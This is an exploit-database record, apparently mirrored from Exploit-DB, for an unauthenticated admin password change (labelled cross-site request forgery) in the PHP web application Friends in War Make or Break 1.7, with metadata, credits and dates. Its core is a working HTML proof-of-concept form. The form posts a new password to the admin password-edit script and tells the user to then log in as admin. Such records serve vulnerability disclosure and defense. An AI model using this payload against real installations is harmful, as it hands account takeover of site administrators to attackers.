ID
VAR-E-201707-0382
EDB ID
42383
TITLE
Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password) - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password).. webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | friends | model: | in war make or break | scope: | eq | version: | 1.7 | Trust: 1.6 |
EXPLOIT
Friends in War Make or Break 1.7 - Unauthenticated admin password change
Url: http://software.friendsinwar.com/
http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery (Change Admin Password)
Trust: 1.6
CREDITS
shinnai
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 42383 | Trust: 1.6 |
| db: | EDBNET | id: | 93610 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/42383/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 42383 |
| db: | EDBNET | id: | 93610 |
LAST UPDATE DATE
2022-07-27T09:18:24.499000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 42383 | date: | 2017-07-26T00:00:00 |
| db: | EDBNET | id: | 93610 | date: | 2017-07-27T00:00:00 |